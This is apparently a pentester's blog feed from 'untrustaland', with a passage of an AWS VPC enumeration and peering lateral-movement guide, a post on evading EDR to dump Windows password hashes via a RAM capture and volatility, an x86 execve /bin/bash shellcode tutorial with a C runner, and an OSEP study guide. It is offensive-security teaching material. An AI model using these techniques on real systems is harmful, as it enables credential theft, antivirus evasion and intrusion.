IP local -> VPC Internal
IP igw -> Internet Gateway
IP nat -> NAT Gateway
IP pcx -> VPC Peering
IP vpce -> VPC Endpoint
IP vgw -> VPN Gateway
IP eni -> Network Interface
</code></pre></div></div>
<ul>
<li>VPC Internal -> Internal IP, no internet connection</li>
<li>Internet Gateway -> Used to access the internet</li>
<li>NAT Gateway -> Does the NAT between machines, allows one way connection to the internet</li>
<li>VPC Peering -> Allows the communication between 2 VPC’s</li>
<li>VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway)</li>
<li>VPN Gateway -> Used to expand the cloud to on premises and vice-versa</li>
<li>Network Interface -> Network Interfaces</li>
</ul>
<h2 id="enumeration-7">Enumeration</h2>
<h3 id="listing-vpcs">Listing VPC’s</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs
</code></pre></div></div>
<h3 id="listing-vpcs-specifing-the-region">Listing VPC’s specifing the region</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs --region us-west-1
</code></pre></div></div>
<h3 id="listing-vpc-information-by-id">Listing VPC information by ID</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-subnets">Listing subnet’s</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets
</code></pre></div></div>
<h3 id="listing-subnets-by-vpc-id">Listing subnet’s by VPC-id</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-routing-tables">Listing routing tables</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables
</code></pre></div></div>
<h3 id="listing-routing-tables-by-vpc-id">Listing routing tables by VPC-id</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h3 id="listing-network-acls">Listing Network ACL’s</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-network-acls
</code></pre></div></div>
<h2 id="lateral-movement-and-pivoting">Lateral Movement and Pivoting</h2>
<ul>
<li>We can abuse VPC peering to do lateral movement</li>
</ul>
<h3 id="scenario">Scenario</h3>
<ul>
<li>There are 3 VPC’s -> A,B,C</li>
<li>A can acess B through peering and B access C. We can use VPC B as a peering pivot to acess VPC C from VPC A.</li>
<li>The lateral movement can be done if we gather keys or other machines</li>
<li>Always enumerate the subnets to see in which subnet we can access other VPC’s</li>
</ul>
<h4 id="listing-vpc-peering-connections">Listing VPC peering connections</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-vpc-peering-connections
</code></pre></div></div>
<h4 id="listing-subnets-of-specific-vpc-important-because-the-access-can-be-restricted-to-specific-subnets-to-other-vpcs">Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC’s)</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-routing-tables-1">Listing routing tables</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-instances-on-the-specified-vpc-id">Listing instances on the specified VPC ID</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --filters "Name=vpc-id,Values=ID"
</code></pre></div></div>
<h4 id="listing-instances-on-the-specified-subnet">Listing instances on the specified subnet</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
</code></pre></div></div>pop3retThis guide was created to help pentesters learning more about AWS misconfigurations and ways to abuse them. It was created with my notes gathered with uncontable hours of study and annotations from various places It’s assumed that you have the AWS keys (This is not difficult to find, just look in developer’s github) Author -> pop3retBypass LSASS Dump protection with RAM Dump2022-09-21T13:38:00+00:002022-09-21T13:38:00+00:00https://www.untrustaland.com/blog/lsass-dump-bypass<p>There is nothing more frustrating than an Antivirus blocking the execution of our tools and/or preventing certain actions to occur, like spawning a shell or blocking our attempts to dump the lsass process.</p>
<p>Modern protections such as EDR will surely block these types of attacks by hooking some API’s and/or monitoring software behavior based on user actions. There are some bypasses that an operator can try (E.g Hell’s Gate) but instead of coding a complex piece of software, it’s possible to try a simpler approach.</p>
<p>Here it’s shown a tool that I have been using when the LSASS Dump fails or gets blocked: Magnet RAM Capture (There is no need to install). <a href="[MagnetRAMCapture.exe](https://www.magnetforensics.com/downloads/MagnetRAMCapture.exe)">LINK</a></p>
<p>Magnet RAM Capture is a forensic tool to dump volatile memory. It will dump ALL the memory to a file, afterwards it’s possible to grab the contents of this dump such as registry hives, passwords, processes, windows info and so on.</p>
<p>The tool will output a raw file, to analyse it, I have been using volatility3, version 2 also works, but there are some Windows builds that I could not make it work, so I stick with version 3.</p>
<p><img src="/assets/images/magnetic_ram_capture.PNG" alt="MAGNETIC" /></p>
<p>To use it, just execute and click in START, this tool is not considered malicious because is a trusted tool used in legit forensic activities.</p>
<p><img src="/assets/images/magnetic_antiscan.png" alt="ANTISCAN" /></p>
<p>In this demonstration, I am using an Windows 10 fully updated with Kaspersky Endpoint Protection fully active and an industry EDR with all the modules activated.</p>
<p>Inspecting windows info</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 vol.py -f /home/kali/Documents/memory_analysis.raw windows.info
</code></pre></div></div>
<p><img src="/assets/images/windows_info.PNG" alt="windows_info" /></p>
<p>Grabbing the hashes with volatility</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python3 vol.py <span class="nt">-f</span> /home/kali/Documents/memory_analysis.raw hashdump
</code></pre></div></div>
<p><img src="/assets/images/hashdump.PNG" alt="hashdump" /></p>
<p>Volatility offers alot of options to analyse the dump:</p>
<ul>
<li>Grab processes</li>
<li>Network Connections</li>
<li>Cache Dump (Domain Credentials)</li>
<li>Dump Processes</li>
</ul>
<p>I recommend you to read the documentation and choose the options that fits your needs during the engagement.</p>
<p>The only drawback about this tool is the size of the raw, it will match the size of the RAM, so if you have a computer with 32GB of ram, the dump file will be 32 GB in size, it can be really difficult to download the file or put it somewhere to analyze, but it all depends on the case and situation.</p>pop3retThere is nothing more frustrating than an Antivirus blocking the execution of our tools and/or preventing certain actions to occur, like spawning a shell or blocking our attempts to dump the lsass process.Shellcode creation and binary execution through execve2022-07-04T13:38:00+00:002022-07-04T13:38:00+00:00https://www.untrustaland.com/blog/execve-shellcode<p>In this guide I will show you how to create shellcode and execute binaries using the execve function.</p>
<h2 id="motivation">Motivation</h2>
<p>Well, Assembly language is amazing, so why dont we learn some fancy ways to generate shellcode and execute programs?</p>
<p>When developing exploits, sometimes we will gonna have to generate our own shellcode and this technique is the way to go.</p>
<p>Another case is for example a shellcode runner, we can put our Assembly inline with the programming language and execute it to get a reverse shell and so on.</p>
<h2 id="pre-concepts-before-we-continue">Pre-concepts before we continue</h2>
<p>I know what you are thinking, “Assembly is hard”, “We really have to do it in assembly?” and the answer is YES! The learning curve of this language is challenging but its always possible to know more about it.</p>
<p>Here I leave some courses for you:</p>
<ul>
<li><a href="https://www.xorpd.net/pages/x86_adventures.html">Assembly Language Adventures</a></li>
<li>SLAE32 - Pentester Academy</li>
</ul>
<h2 id="why-32-bits-first">Why 32 bits first?</h2>
<p>Because it’s <strong>easier</strong> and there are applications out there that still uses 32 bits.</p>
<p>Some concepts change in x64, so its better to learn the logic and concepts in 32 bits, then 64 will be better to assimilate.</p>
<h2 id="assembly-x86-lightning-course">Assembly x86 lightning course</h2>
<p>Lets pick some basic concepts before we continue.</p>
<h3 id="registers">Registers</h3>
<p>Processor’s fast internal memory to store and move data. There are types of registers and each type has its own purposes (Nowadays all registers can be used as general purpose).</p>
<p>You can also think that registers are like variables.</p>
<p>Lets pick some examples.</p>
<ul>
<li>EAX -> 32 bit register, can store a DWORD and be further divided in AX, AH and AL. (Commonly used as an accumulator for mathematic operations, store return addresses and syscalls)</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EAX (32 Bits) -> 0x12345678
AX (16 Bits) -> 5678
AH (8 Bits, "higher") -> 56
AL (8 Bits, "lower") -> 78
</code></pre></div></div>
<ul>
<li>EIP -> Stores the next instruction to be executed (Gain control of EIP and control the execution flow of your program, you can imagine why).</li>
<li>ESP -> Pointer to the top of the stack.</li>
<li>EFLAGS -> Contains other register like ZF,OF (They are used for example in conditional branching).</li>
<li><a href="https://www.tutorialspoint.com/assembly_programming/assembly_registers.htm">More info on registers</a></li>
</ul>
<h3 id="zeroing-registers-and-removing-null-bytes">Zeroing Registers (And removing null bytes)</h3>
<p>There are alot of situations in which we need to zero a register or remove specific characters from a shellcode, one example is related to remove null bytes to use it later in exploits.</p>
<p>Some techniques:</p>
<p><strong>1. Using the lowest part of the register</strong></p>
<p>This is very interesting, we can zero the register with a XOR operation and put some content in AL.</p>
<p>Example</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor eax,eax ; Make the register contains 0
mov al, 5 ; Move 0x05 to AL
</code></pre></div></div>
<p>EAX now contains 5.</p>
<p><strong>2. Negative numbers</strong></p>
<p>Another cool trick, its possible to have our selected value in situations where we cant use the number.</p>
<p>Imagine the situation where we are writing some exploit and cant use the number 0x00000001 because it contains null bytes (These zeros in the address).</p>
<p>To solve this problem, its possible to use the NEG instuction in assembly, this instruction will do its two complement and put the lower part in the register (<em>What?</em>)</p>
<p>Lets ilustrate this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov eax, 0xffffffff
neg EAX
</code></pre></div></div>
<p>EAX will contain 0x01 without the null bytes.</p>
<p>What happens here is when use the NEG instruction, it will flip the bits and add 1 to the result (Also known as two’s complement in assembly)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Binary representation of NEG instruction
11111111
After flip
00000000
Add 1
00000001
</code></pre></div></div>
<p>This way we can put the number inside EAX without actually putting it.</p>
<p>You can use your imagination, there are alot of things to create, another example, instead of using NOP operations (0x90) we can use XCHG EAX,EAX. (This effectly do nothing).</p>
<h3 id="segments">Segments</h3>
<p>Other important concept are data segments, which are places where our code is put during the execution of assembly.</p>
<p>Some examples:</p>
<ul>
<li>.text segment -> Where the executable code is stored</li>
<li>.bss -> Uninitialized variables</li>
<li>.data -> Initialized variables</li>
</ul>
<p>Here is an example of a program that prints our lovely “Hello World” message</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start
; Define an area for our code, in this case the text section
section .text
; Define program entry point
_start:
; Print the message on the screen
mov eax, 0x04 ; Syscall number (Write = 4)
mov ebx, 0x01 ; Function argument 1 (Stdout)
mov ecx, message ; Function argument 2 (Pointer to the message)
mov edx, mlen ; Function argument 3 (Message lenght)
int 0x80 ; Invoke Interruption (syscall)
; Exit the program
mov eax, 0x01 ; Exit syscall number
mov ebx, 0x01 ; Arbitrary return value
int 0x80 ;
; Define an are to initialized data (.data section)
section .data
message: db "Hello World!" ; Here, we define a label with our string
mlen equ $-message ; Using the equ function to count the lenght of our message
</code></pre></div></div>
<p>Its easier to see how the data segments are used with this piece of code.</p>
<h3 id="stack">Stack</h3>
<p>Stack is a data structure where we can store values for further processing, its a LIFO structure (Last in first out) where values are PUSHED to the stack and removed with the POP instruction (PUSH AND POP).</p>
<p>Think it like a pile of plates. You put one plate inside the other and when you need to remove, remove the one that is in the top. (Last in, first out).</p>
<h3 id="endianess">Endianess</h3>
<p>Sometimes your brain will get so confused you want to stop and take a break, the reason for that in many cases is Endianess.</p>
<p>This is the way the stack stores information, for our purpose, we will take a look at little endian.</p>
<p><code class="language-plaintext highlighter-rouge">A little-endian system stores the least-significant byte at the smallest address.</code></p>
<p><em>What does it mean?</em></p>
<p>Lets look at an example.</p>
<p>When we have an address like <em>0x12345678</em> the least significant bytes are the ones from right to left (876..), so this address when put into a stack will be shown as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Lower addresses
8
7
6
5
4
3
2
1
High Addresses
</code></pre></div></div>
<p>The memory will always store information in lower and lower addresses. This is important when we develop exploits as we need to pass the address in this form to be correctly interpreted in memory.</p>
<p>There is also <em>Big Endian</em>, but I will leave you as an exercise to search about it.</p>
<h3 id="syscalls">Syscalls</h3>
<p>In Linux, syscalls are ways to interact with the kernel to do specific actions, like write something on the screen, exit programs, create files and so on. (In Windows, they are called Api’s).</p>
<p>To execute a syscall in Linux, you need to pass its value in EAX and the other values in EBX,ECX..After this you will issue the command <em>int 0x80</em> that will look up in the syscall table and execute the action.</p>
<p>Example</p>
<p>The exit syscall is used to finalize program and set a status code.It Contains the follow definition:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">exit</span><span class="p">(</span><span class="kt">int</span> <span class="n">status</span><span class="p">);</span>
</code></pre></div></div>
<p>It receives one argument, the status. Converting this to assembly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>; Exit the program
mov eax, 0x01 ; Exit syscall number
mov ebx, 0x01 ; Arbitrary return value
int 0x80 ;
</code></pre></div></div>
<p>Passing the syscall number (1) in eax, the status in EBX and then issuing the <em>int 0x80</em> to invoke the syscall.</p>
<h3 id="execve">EXECVE</h3>
<p>From the man pages (<code class="language-plaintext highlighter-rouge">man execve</code>):</p>
<p><em>execve() executes the program referred to by pathname</em></p>
<p>Definition</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">execve</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">pathname</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">argv</span><span class="p">[],</span><span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">envp</span><span class="p">[]);</span>
</code></pre></div></div>
<p>Interesting info</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>argv is an array of pointers to strings passed to the new program as its command-line arguments. By convention, the first of these strings (i.e., argv[0]) should contain the filename associated with the file being executed. The argv array must be terminated by a NULL pointer.
(Thus, in the new program, argv[argc] will be NULL.)
envp is an array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new program. The envp array must be terminated by a NULL pointer.
</code></pre></div></div>
<p>We will use this function to execute our program with the following values.</p>
<ul>
<li>The pathname is the path for the program we want to execute (Example <code class="language-plaintext highlighter-rouge">/bin/bash, 0x00</code>)</li>
<li>The second argument will be the address of <code class="language-plaintext highlighter-rouge">/bin/bash</code>followed by null bytes (As this value is an array of pointers)</li>
<li>The third argument will contain null as well.</li>
</ul>
<p>One interesting fact is that our payload <em>cannot contain null bytes</em>. So how we will leverage that?</p>
<h2 id="building-our-assembly">Building our assembly</h2>
<p>To solve the problem we faced earlier, we will gonna use the first technique to zero out the register.</p>
<h3 id="binbash-trickery">/bin/bash trickery</h3>
<p>The stack is aligned with 4 bytes in x86 processors, so we need to push values multiple of 4 and reverse them (Little-endian).</p>
<p>One thing that we can do is to push in the following order</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/bin (4 bytes)
bash (4 bytes)
//// (4 bytes)
</code></pre></div></div>
<p>No matter how many <code class="language-plaintext highlighter-rouge">/</code> we put in our command, the prompt will interpret as one.</p>
<h3 id="final-assembly-code">Final Assembly code</h3>
<p>This is our final code</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>; Execute programs through execve in Assembly
; Author: pop3ret
; The _start directive defines the start of our program
global _start
_start:
; .text segment, where our code resides
section .text:
xor eax,eax ; Zero out the register
push eax ; put 0x0 into the stack
; Put ////bin/bash into the Stack, remember that this value needs to be
; multiple of 4 to align the stack. (First argument)
push 0x68736162 ; /bin (Reversed)
push 0x2f6e6962 ; bash (Reversed)
push 0x2f2f2f2f ; ////
; Puts the other arguments into the stack
mov ebx, esp ; EBX will now point to the string ////bin/bash,0x0 (First argument). Each push, esp = esp - 4
push eax ; PUSH 0
mov edx,esp ; EDX now points to null (Third argument)
push ebx ; EBX contains a pointer to /bin/bash
mov ecx,esp ; ECX points to the address of /bin/bash (Second argument)
; Calling execve (Syscall 11)
mov al,11
int 0x80
</code></pre></div></div>
<p>Let’s compile this ASM with this simple bash script</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="c">#############################################</span>
<span class="c"># Simple compiler and linker for nasm (x86) #</span>
<span class="c"># Author: pop3ret #</span>
<span class="c"># Usage: ./compiler.sh asm_name #</span>
<span class="c">#############################################</span>
<span class="c">## @ Main</span>
<span class="c"># Compiling</span>
nasm <span class="nv">$1</span>.asm <span class="nt">-o</span> <span class="nv">$1</span>.o
<span class="c"># Linking</span>
ld <span class="nv">$1</span>.o <span class="nt">-o</span> <span class="nv">$1</span>
</code></pre></div></div>
<p>And execute</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./execve
</code></pre></div></div>
<p>After the execution we get our <code class="language-plaintext highlighter-rouge">/bin/bash</code>.</p>
<h2 id="shellcode">Shellcode</h2>
<p>Shellcode is basically the opcodes that will execute our assembly</p>
<p>Example with objdump:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-D</span> execve <span class="nt">-M</span> intel
</code></pre></div></div>
<p><img src="/assets/images/objdump.png" alt="OBJDUMP" /></p>
<p>The shellcode will be the second column. (31 c0..)</p>
<p>To grab this information and format, I will use a shell script from commandlinefu (<a href="https://www.commandlinefu.com/commands/view/6051/get-all-shellcode-on-binary-file-from-objdump">Link</a>)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> ./execve|grep <span class="s1">'[0-9a-f]:'</span>|grep <span class="nt">-v</span> <span class="s1">'file'</span>|cut <span class="nt">-f2</span> <span class="nt">-d</span>:|cut <span class="nt">-f1-6</span> <span class="nt">-d</span><span class="s1">' '</span>|tr <span class="nt">-s</span> <span class="s1">' '</span>|tr <span class="s1">'\t'</span> <span class="s1">' '</span>|sed <span class="s1">'s/ $//g'</span>|sed <span class="s1">'s/ /\\x/g'</span>|paste <span class="nt">-d</span> <span class="s1">''</span> <span class="nt">-s</span> |sed <span class="s1">'s/^/"/'</span>|sed <span class="s1">'s/$/"/g'</span>
</code></pre></div></div>
<p>And put the result inside this C file</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
</span>
<span class="kt">char</span> <span class="n">shellcode</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x52\x89\xe1\xb0\x0b\xcd\x80</span><span class="s">"</span><span class="p">;</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ret</span><span class="p">)()</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">shellcode</span><span class="p">;</span>
<span class="n">ret</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Compiling</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc <span class="nt">-fno-stack-protector</span> <span class="nt">-z</span> execstack shellcode.c <span class="nt">-o</span> shellcode
</code></pre></div></div>
<p>And execute to get a shell!</p>pop3retIn this guide I will show you how to create shellcode and execute binaries using the execve function.OSEP Study Guide 20222022-06-26T13:38:00+00:002022-06-26T13:38:00+00:00https://www.untrustaland.com/blog/osep-study-guide<p>Hello! I decided to start my blog with a post about a certification a did a month ago. <strong>OSEP</strong></p>
<h2 id="study-plan">Study Plan</h2>
<p>Well, there is so much things you can study before you do the exam. I will share some of my studies I had to do before and while the VPN was online.</p>
<h3 id="1---the-material">1 - The material</h3>
<p>It looks obivous that you need to study the materials but you can easily get distracted while studying clicking in links or searching something during your reading.
I read the material 5 times entirely to understand (<strong>ALMOST</strong>) all the content. Go ahead and read, try EVERYTHING in the lab, not kidding, you need to understand what are you doing with the techniques during the lab, exam and your daily life as pentester, so practice as much as you can.</p>
<h3 id="2---c-and-powershell">2 - C# and PowerShell</h3>
<p>The course syllabus says that you need a basic level of C# to comprehend the subjects, but when you start reading you are <strong>SPAMED</strong> with C# and PowerShell.
My recommendation is if you didn’t buy the course yet, start a course on Udemy about C#, like a quick Bootcamp, understand how the language works in a basic/intermediate level is crucial for you to continue you journey into this awesome course.
Regarding powershell, there are some things like a reflection powershell runner or in memory powershell execution that you’re gonna stuck if you do not understand.
My recommendation is also take a look at the language, understand its logic and every time you pick up a script, try to understand it, don’t rush the materials. (I am saying this because I did this lol, take your time, it will be better to spend more time in one subject than rush through the materials and get lost)</p>
<h3 id="3---take-notes">3 - Take notes</h3>
<p>This is very important, I use <strong>Obsidian</strong> to take notes, but you can use whatever you like, do your notes about commands, highlight parts in the code that you do not understand and research them.</p>
<h3 id="4---labs">4 - LABS</h3>
<p><strong>DO THE LABS</strong>.</p>
<p>The labs will help you ALOT, there are 6 labs, the first ones are easier and the last ones will make you almost cry.
Take your time, research, if you stuck <strong>TRY HARDER</strong> and continue. I learned ALOT during the resolution of the labs, the 6 lab is the most realistic one.</p>
<h2 id="the-exam">The exam</h2>
<p>I cant say much about it, but you will have some objectives and you need to achieve them. Offsec did an awesome job in the exam and the labs, you will use all the things you learned, that’s why your annotations are important.
My tip here is to write some prototypes of functions, macros, payloads that bypass AV and so on. Then use them during the exam, it will fasten your resolution.
Also there is one important thing, if you did OSCP or another certification that covers Active Directory, mix them with your OSEP notes, they will be valuable during the exam.
I took the entire 48 hours to do the exam and like 14 hours to finish the report.</p>
<h2 id="worth-it">Worth it?</h2>
<p>Of course! In my opinion this exam was one of the best exams I did in my career, learned so many things related to AD, Antivirus and other bypasses that blew my mind.
If you have the condition to buy it or your company gives the cert to you, don’t waste time and get it :).</p>
<h2 id="complementary-content">Complementary content</h2>
<p>Some friends of mine said that these labs also help during the preparation:</p>
<ul>
<li>Dante Lab hackthebox</li>
<li>APT Labs hackthebox</li>
<li>Rastamouse lab hackthebox</li>
<li>You can create your own lab and exploit them</li>
</ul>
<p>And these contents will help you during your journey</p>
<ul>
<li>PowerView (Take notes)</li>
<li>Invoke-ACLScanner and Invoke-ACLAbuse (To abuse AD ACL’s)</li>
<li>Invoke-SharpLoader (Efective way to bypass AV in memory but beware of Add-Type)</li>
<li>BloodHound</li>
<li>Standard AD techniques to exploit privileges, permissions and tickets.</li>
</ul>
<h2 id="beyond-the-course">Beyond the course</h2>
<p>Here I give you some topics to research during or after the course to improve the content:</p>
<ul>
<li>D/Invoke</li>
<li>Direct Syscalls</li>
<li>Hell’s gate technique to bypass AV (Beware of C++, learn it first)</li>
<li>Sektor7 courses on malware dev are also a good path to follow beyond this certification.</li>
<li>STD Api Metasploit (Why disable it first?)</li>
<li>Second stage encoding metasploit</li>
<li>Mix the techniques of AV bypass and create your own payload (<strong>Do not put your payload in virus total</strong>)</li>
<li>Try to bypass the latest version of your AV as an exercise</li>
</ul>
<p>I used only metasploit during the course and exam, but you can use other C2 as well, like Covenant and if you stuck during the exam, breath, sleep and repeat.</p>
<p>Feel free to send me a message in my email p3ret@untrustaland.com or reach me in Linkedin with your questions too.</p>
<p>That’s all!</p>pop3retHello! I decided to start my blog with a post about a certification a did a month ago. OSEP